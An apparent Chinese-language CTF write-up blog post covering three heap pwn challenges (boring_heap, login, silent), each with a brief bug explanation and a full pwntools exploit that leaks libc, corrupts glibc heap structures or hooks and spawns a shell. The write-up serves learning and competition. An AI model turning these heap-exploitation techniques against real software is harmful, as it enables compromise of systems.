<!DOCTYPE html>












  


<html class="theme-next gemini use-motion" lang>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=7.1.1">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.1.1">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.1.1">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.1.1">


  <link rel="mask-icon" href="/images/logo.svg?v=7.1.1" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '7.1.1',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: false,
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="这比赛算是ak了，就是自己代码写的太差了一个爆破脚本写了好久。。还有unlink手速不够快啊，没有charlie师傅的手速和代码功底，写的又丑又慢。。。">
<meta name="keywords" content="ctf-pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="2019上海大学生pwn">
<meta property="og:url" content="http://yoursite.com/2019/11/03/2019上海大学生pwn/index.html">
<meta property="og:site_name" content="peanuts&#39;blog">
<meta property="og:description" content="这比赛算是ak了，就是自己代码写的太差了一个爆破脚本写了好久。。还有unlink手速不够快啊，没有charlie师傅的手速和代码功底，写的又丑又慢。。。">
<meta property="og:locale" content="default">
<meta property="og:updated_time" content="2019-11-02T16:43:41.623Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2019上海大学生pwn">
<meta name="twitter:description" content="这比赛算是ak了，就是自己代码写的太差了一个爆破脚本写了好久。。还有unlink手速不够快啊，没有charlie师傅的手速和代码功底，写的又丑又慢。。。">





  
  
  <link rel="canonical" href="http://yoursite.com/2019/11/03/2019上海大学生pwn/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>2019上海大学生pwn | peanuts'blog</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">peanuts'blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Home</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
    
      
    

    

    <a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i> <br>About</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archives</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>Tags</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-mylove">

    
    
    
      
    

    

    <a href="/Mylove/" rel="section"><i class="menu-item-icon fa fa-fw fa-heart"></i> <br>Mylove</a>

  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/11/03/2019上海大学生pwn/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="peanuts">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/touxiang.JPG">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="peanuts'blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">2019上海大学生pwn

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2019-11-03 00:29:13 / Modified: 00:43:41" itemprop="dateCreated datePublished" datetime="2019-11-03T00:29:13+08:00">2019-11-03</time>
            

            
              

              
            
          </span>

          

          
            
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>这比赛算是ak了，就是自己代码写的太差了一个爆破脚本写了好久。。还有unlink手速不够快啊，没有charlie师傅的手速和代码功底，写的又丑又慢。。。<br><a id="more"></a></p>
<blockquote>
<p>赶时间写的，群友要wp感觉直接给博客这个方便。。</p>
</blockquote>
<h2 id="boring-heap"><a href="#boring-heap" class="headerlink" title="boring_heap"></a>boring_heap</h2><p>题目其实利用上挺简单的，就是漏洞的发现上，漏洞在medium的时候abs的溢出，这个溢出导致了后面的一些列操作，可以用house of orange(不是很喜欢)，也可以攻击main_arena改top_chunk我用的就是这个。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><span class="line">from pwn import*</span><br><span class="line"></span><br><span class="line">context.log_level = &quot;debug&quot;</span><br><span class="line"></span><br><span class="line">#p = process(&quot;./pwn&quot;)</span><br><span class="line">p = remote(&quot;8sdafgh.gamectf.com&quot;,10001)</span><br><span class="line">a = ELF(&quot;./pwn&quot;)</span><br><span class="line">e = a.libc</span><br><span class="line">#gdb.attach(p)</span><br><span class="line">def add(idx,content):</span><br><span class="line">    p.recvuntil(&quot;5.Exit&quot;)</span><br><span class="line">    p.sendline(&quot;1&quot;)</span><br><span class="line">    p.recvuntil(&quot;Input Size:&quot;)</span><br><span class="line">    p.sendline(str(idx))</span><br><span class="line">    p.recvuntil(&quot;Input Content:&quot;)</span><br><span class="line">    p.send(content)</span><br><span class="line">def delete(idx):</span><br><span class="line">    p.recvuntil(&quot;5.Exit&quot;)</span><br><span class="line">    p.sendline(&quot;3&quot;)</span><br><span class="line">    p.recvuntil(&quot;Which one do you want to delete?&quot;)</span><br><span class="line">    p.sendline(str(idx))</span><br><span class="line"></span><br><span class="line">def modify(idx,py,content):</span><br><span class="line">    p.recvuntil(&quot;5.Exit&quot;)</span><br><span class="line">    p.sendline(&quot;2&quot;)</span><br><span class="line">    p.recvuntil(&quot;Which one do you want to update?&quot;)</span><br><span class="line">    p.sendline(str(idx))</span><br><span class="line">    p.recvuntil(&quot;Where you want to update?&quot;)</span><br><span class="line">    p.sendline(str(py))</span><br><span class="line">    p.recvuntil(&quot;Input Content:&quot;)</span><br><span class="line">    p.sendline(content)</span><br><span class="line"></span><br><span class="line">def show(idx):</span><br><span class="line">    p.recvuntil(&quot;5.Exit&quot;)</span><br><span class="line">    p.sendline(&quot;4&quot;)</span><br><span class="line">    p.recvuntil(&quot;Which one do you want to view?&quot;)</span><br><span class="line">    p.sendline(str(idx))</span><br><span class="line"></span><br><span class="line">add(2,&quot;\x00&quot;*0x18+p64(0x80)+&quot;\n&quot;)</span><br><span class="line">add(2,&quot;aaaaaa\n&quot;)</span><br><span class="line">#raw_input()</span><br><span class="line">add(2,p64(0x21)*6)</span><br><span class="line">add(2,p64(0x21)*6)</span><br><span class="line">modify(1,0x80000000,&quot;a&quot;*0x10+&quot;\x00&quot;*8+p64(0x91))</span><br><span class="line">delete(1)</span><br><span class="line">add(2,&quot;8888888\n&quot;)#4</span><br><span class="line">show(4)</span><br><span class="line">p.recvuntil(&quot;8888888\n&quot;)</span><br><span class="line">libc_addr = u64(p.recvuntil(&quot;\n&quot;,drop=True).ljust(8,&quot;\x00&quot;))-0x3c4bf8</span><br><span class="line">print hex(libc_addr)</span><br><span class="line"># bss : 0x555555554000+2020C0</span><br><span class="line">add(3,&quot;88\n&quot;) #5</span><br><span class="line">add(2,p64(0x21)*6) #6</span><br><span class="line">add(2,p64(0x21)*6) #7</span><br><span class="line">add(2,p64(0x21)*6) #8</span><br><span class="line">modify(6,0x80000000,&quot;a&quot;*0x10+&quot;\x00&quot;*8+p64(0x91))</span><br><span class="line">delete(6)</span><br><span class="line">add(3,&quot;8888888\n&quot;) #9</span><br><span class="line">add(2,&quot;8888888\n&quot;) #10</span><br><span class="line">delete(10)</span><br><span class="line">modify(7,0,p64(0x0)+p64(0x41)+p64(0x51))</span><br><span class="line">add(2,&quot;8\n&quot;)#11</span><br><span class="line">delete(5)</span><br><span class="line">modify(2,0,p64(0x3c4b30+libc_addr))</span><br><span class="line">add(3,&quot;a\n&quot;)</span><br><span class="line">add(3,&quot;\x00&quot;*8*7+p64(libc_addr+0x3c4b10-0x10))</span><br><span class="line">add(1,p64(0xf1147+libc_addr)*2+&quot;\n&quot;)</span><br><span class="line">p.recvuntil(&quot;5.Exit&quot;)</span><br><span class="line">p.sendline(&quot;1&quot;)</span><br><span class="line">p.recvuntil(&quot;Input Size:&quot;)</span><br><span class="line">p.sendline(str(1))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="login"><a href="#login" class="headerlink" title="login"></a>login</h2><p>这个题漏洞在uaf没有leak，但是给了一个login函数可以用来进行爆破libc地址。首先利用uaf构造出任意地址写，然后吧heap地址写成got表地址，利用login函数去爆破出libc地址，具体操作可以看exp理（写的不是很好，但是也花了我好久。。主要还是太菜了）。接下来就是利用任意写，写free_hook然后利用了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><span class="line">from pwn import*</span><br><span class="line"></span><br><span class="line">context.log_level = &quot;debug&quot;</span><br><span class="line"></span><br><span class="line">#p = process(&quot;./login&quot;)</span><br><span class="line">p = remote(&quot;8sdafgh.gamectf.com&quot;,20000)</span><br><span class="line">a = ELF(&quot;./login&quot;)</span><br><span class="line">e = a.libc</span><br><span class="line">#gdb.attach(p)</span><br><span class="line">def add(idx,Size,content):</span><br><span class="line">    p.recvuntil(&quot;5.Exit&quot;)</span><br><span class="line">    p.sendline(&quot;1&quot;)</span><br><span class="line">    p.recvuntil(&quot;Input the user id:&quot;)</span><br><span class="line">    p.sendline(str(idx))</span><br><span class="line">    p.recvuntil(&quot;Input the passwords length:&quot;)</span><br><span class="line">    p.sendline(str(Size))</span><br><span class="line">    p.recvuntil(&quot;Input the password:&quot;)</span><br><span class="line">    p.send(content)</span><br><span class="line">def delete(idx):</span><br><span class="line">    p.recvuntil(&quot;5.Exit&quot;)</span><br><span class="line">    p.sendline(&quot;3&quot;)</span><br><span class="line">    p.recvuntil(&quot;Input the user id:&quot;)</span><br><span class="line">    p.sendline(str(idx))</span><br><span class="line"></span><br><span class="line">def modify(idx,Size,content):</span><br><span class="line">    p.recvuntil(&quot;5.Exit&quot;)</span><br><span class="line">    p.sendline(&quot;2&quot;)</span><br><span class="line">    p.recvuntil(&quot;Input the user id:&quot;)</span><br><span class="line">    p.sendline(str(idx))</span><br><span class="line">    p.recvuntil(&quot;Input the password length:&quot;)</span><br><span class="line">    p.sendline(str(Size))</span><br><span class="line">    p.recvuntil(&quot;Input password:&quot;)</span><br><span class="line">    p.send(content)</span><br><span class="line"></span><br><span class="line">def show(idx,content):</span><br><span class="line">    p.recvuntil(&quot;5.Exit&quot;)</span><br><span class="line">    p.sendline(&quot;4&quot;)</span><br><span class="line">    p.recvuntil(&quot;Input the user id:&quot;)</span><br><span class="line">    p.sendline(str(idx))</span><br><span class="line">    p.recvuntil(&quot;Input new pass:&quot;)</span><br><span class="line">    p.sendline(content)</span><br><span class="line"></span><br><span class="line">def po(total,num,string):</span><br><span class="line">    s = &quot;&quot;</span><br><span class="line">    s = p8(num) + string</span><br><span class="line">    add(1,total,s)</span><br><span class="line">    p.recvuntil(&quot;\n&quot;)</span><br><span class="line">    t = p.recvuntil(&quot;\n&quot;)</span><br><span class="line">    if t == &quot;Login success!\n&quot;:</span><br><span class="line">        show(2,p64(0x601F98+5-total)+p64(0x000000000040089e)+p64(0x68))</span><br><span class="line">        raw_input()</span><br><span class="line">        print &quot;ok&quot;</span><br><span class="line">        return True</span><br><span class="line"></span><br><span class="line">#modify(0,0x80,&quot;b&quot;*7)</span><br><span class="line">modify(0,0x68,&quot;/bin/sh\x00&quot;)</span><br><span class="line">modify(1,0x68,&quot;c\n&quot;)</span><br><span class="line">delete(0)</span><br><span class="line">delete(1)</span><br><span class="line">modify(2,0x18,p64(0x601F98+4)+p64(0x000000000040089e)+p64(0x68))</span><br><span class="line">st = &quot;\x7f&quot;</span><br><span class="line"></span><br><span class="line">for j in range(2,7):</span><br><span class="line">    for i in range(0,0x100):</span><br><span class="line">        print j</span><br><span class="line">        if po(j,i,st):</span><br><span class="line">            st = p8(i)+st</span><br><span class="line">            print hex(u64(st.ljust(8,&quot;\x00&quot;)))</span><br><span class="line">            break</span><br><span class="line">libc_addr = u64(st.ljust(8,&quot;\x00&quot;)) -0x844f0</span><br><span class="line">print &quot;libc:&quot;+hex(libc_addr)</span><br><span class="line">free_hook = libc_addr+0x3c67a8</span><br><span class="line">show(2,p64(free_hook)+p64(0x000000000040089e)+p64(0x68))</span><br><span class="line">show(1,p64(libc_addr+0x45390))</span><br><span class="line">modify(4,0x80,&quot;/bin/sh\x00&quot;)</span><br><span class="line">delete(4)</span><br><span class="line">#show(1,&quot;\x00&quot;*8+p64(0x21)+p64(0)+p64(0x000000000040089e)+p64(0)+p64(0x91)+p64(0x602040-0x18)+p64(0x602040-0x10))</span><br><span class="line">#delete(0)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="silent"><a href="#silent" class="headerlink" title="silent"></a>silent</h2><p>题目本身没有开pie漏洞比较明显是uaf，其实可以利用unlink，这里unlik的构造就看exp吧，其实关键就在unlink构造了，膜那些构造很快的我也是搞了2个小时吧。主要是太菜了，unlink不太用。。。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line">from pwn import*</span><br><span class="line"></span><br><span class="line">context.log_level = &quot;debug&quot;</span><br><span class="line"></span><br><span class="line">#p = process(&quot;./pwn-1&quot;)</span><br><span class="line">p = remote(&quot;8sdafgh.gamectf.com&quot;,35555)</span><br><span class="line">a = ELF(&quot;./pwn-1&quot;)</span><br><span class="line">e = a.libc</span><br><span class="line">#gdb.attach(p)</span><br><span class="line">def add(idx,content):</span><br><span class="line">    p.recvuntil(&quot;4.Exit&quot;)</span><br><span class="line">    p.sendline(&quot;1&quot;)</span><br><span class="line">    p.recvuntil(&quot;Which kind of note do you want to add?&quot;)</span><br><span class="line">    p.sendline(str(idx))</span><br><span class="line">    p.recvuntil(&quot;Content:&quot;)</span><br><span class="line">    p.send(content)</span><br><span class="line">def delete(idx):</span><br><span class="line">    p.recvuntil(&quot;4.Exit&quot;)</span><br><span class="line">    p.sendline(&quot;2&quot;)</span><br><span class="line">    p.recvuntil(&quot;Which kind of note do you want to delete?&quot;)</span><br><span class="line">    p.sendline(str(idx))</span><br><span class="line"></span><br><span class="line">def edit(idx,content):</span><br><span class="line">    p.recvuntil(&quot;4.Exit&quot;)</span><br><span class="line">    p.sendline(&quot;3&quot;)</span><br><span class="line">    p.recvuntil(&quot;Which kind of note do you want to update?&quot;)</span><br><span class="line">    p.sendline(str(idx))</span><br><span class="line">    p.recvuntil(&quot;Content:&quot;)</span><br><span class="line">    p.sendline(content)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(2,&quot;a\n&quot;)</span><br><span class="line">add(1,&quot;b\n&quot;)</span><br><span class="line">edit(2,&quot;\x00&quot;*0x8+p64(0x21)+p64(0x6020D8-0x18)+p64(0x6020D8-0x10)+p64(0x20)+p64(0x90)+p64(0x21)*50)</span><br><span class="line">delete(2)</span><br><span class="line">add(1,&quot;c\n&quot;)</span><br><span class="line">add(1,&quot;d\n&quot;)</span><br><span class="line"></span><br><span class="line">edit(2,&quot;\x00&quot;*0x8+p64(0x21)+p64(0x6020D8-0x18)+p64(0x6020D8-0x10)+p64(0x20)+p64(0x90))</span><br><span class="line">delete(1)</span><br><span class="line"></span><br><span class="line">edit(2,p64(0)*2+p64(0x602018))</span><br><span class="line">edit(1,p64(0x400740))</span><br><span class="line">edit(2,p64(0)*2+p64(0x602020))</span><br><span class="line">delete(1)</span><br><span class="line">p.recvuntil(&quot;2.Large\n&quot;)</span><br><span class="line">libc_addr =  u64(p.recvuntil(&quot;\n&quot;,drop=True).ljust(8,&quot;\x00&quot;))-0x6f690</span><br><span class="line">print hex(libc_addr)</span><br><span class="line">edit(2,p64(0)*2+p64(0x602018))</span><br><span class="line">edit(1,p64(libc_addr+0x45390))</span><br><span class="line">edit(2,&quot;/bin/sh\x00&quot;)</span><br><span class="line">delete(2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>可以看得出3个题都是一个人出的😂，漏洞点的设置很有创意感觉，单最后都是libc，感觉。。难怪大佬们做的那么快。。也算是从去年一个不会晋升到了ak吧，虽然感觉今年的竞争激烈了。一年确实能改变很多能从0到1，平常还是多搞点真实环境。。。。。</p>

      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf-pwn/" rel="tag"># ctf-pwn</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/10/29/RSA-learing/" rel="next" title="RSA-learing">
                <i class="fa fa-chevron-left"></i> RSA-learing
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/18/PAT-A-刷题记录/" rel="prev" title="PAT-A-刷题记录">
                PAT-A-刷题记录 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  
    <div class="comments" id="comments">
      <div id="lv-container" data-id="city" data-uid="MTAyMC80NDI3My8yMDgwNQ=="></div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/touxiang.JPG" alt="peanuts">
            
              <p class="site-author-name" itemprop="name">peanuts</p>
              <div class="site-description motion-element" itemprop="description"></div>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">19</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              

              
                
                
                <div class="site-state-item site-state-tags">
                  
                    
                      <a href="/tags/">
                    
                  
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">13</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          

          

          

          

          
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#boring-heap"><span class="nav-number">1.</span> <span class="nav-text">boring_heap</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#login"><span class="nav-number">2.</span> <span class="nav-text">login</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#silent"><span class="nav-number">3.</span> <span class="nav-text">silent</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#总结"><span class="nav-number">4.</span> <span class="nav-text">总结</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>
  


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">peanuts</span>

  

  
</div>


  <div class="powered-by">Powered by <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.1.1</div>




    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

    <span id="busuanzi_container_site_pv">总访问量<span id="busuanzi_value_site_pv"></span>次</span>
    <span class="post-meta-divider">|</span>
    <span id="busuanzi_container_site_uv">总访客<span id="busuanzi_value_site_uv"></span>人</span>
    <span class="post-meta-divider">|</span>



        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  

  

  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/utils.js?v=7.1.1"></script>

  <script src="/js/motion.js?v=7.1.1"></script>



  
  


  <script src="/js/affix.js?v=7.1.1"></script>

  <script src="/js/schemes/pisces.js?v=7.1.1"></script>




  
  <script src="/js/scrollspy.js?v=7.1.1"></script>
<script src="/js/post-details.js?v=7.1.1"></script>



  


  <script src="/js/next-boot.js?v=7.1.1"></script>


  

  

  

  


  
    <script>
  window.livereOptions = {
    refer: '2019/11/03/2019上海大学生pwn/'
  };
  (function(d, s) {
    var j, e = d.getElementsByTagName(s)[0];
    if (typeof LivereTower === 'function') { return; }
    j = d.createElement(s);
    j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
    j.async = true;
    e.parentNode.insertBefore(j, e);
  })(document, 'script');
</script>

  


  




  

  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
